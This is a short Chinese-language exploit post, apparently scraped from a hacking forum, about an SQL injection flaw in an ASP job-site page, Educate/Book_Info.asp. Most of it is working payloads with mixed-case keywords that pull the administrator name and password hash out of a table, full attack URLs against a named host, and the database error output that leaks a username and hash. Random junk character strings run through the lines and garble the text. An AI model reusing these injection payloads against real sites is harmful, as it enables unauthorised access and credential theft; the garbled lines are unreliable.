漏洞出现在Educate/Book_Info.asp7 @& l2 \% [1 N/ p1 k" U
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
- m. }" |# \8 l- Y( {+ Mexp:如下: S" s- V0 q7 F
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
0 }. e7 w! \# D/ D" ^5 E查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper). n. x3 i; {5 m* R7 Y$ j4 e
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
- X1 ~2 {$ F1 SMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
, e1 j) x" Y2 E5 _. T6 F将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。4 z2 V2 p9 K9 c* j# {
/Educate/Book_Info.asp,行 8
: F8 v6 {* S; `6 zhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)! W7 M4 M! Q* T; D o/ S: G+ K
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'9 L/ n/ h; N( h* Q0 K7 A
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。/ w0 _$ U5 v0 S6 W
/Educate/Book_Info.asp,行 8 |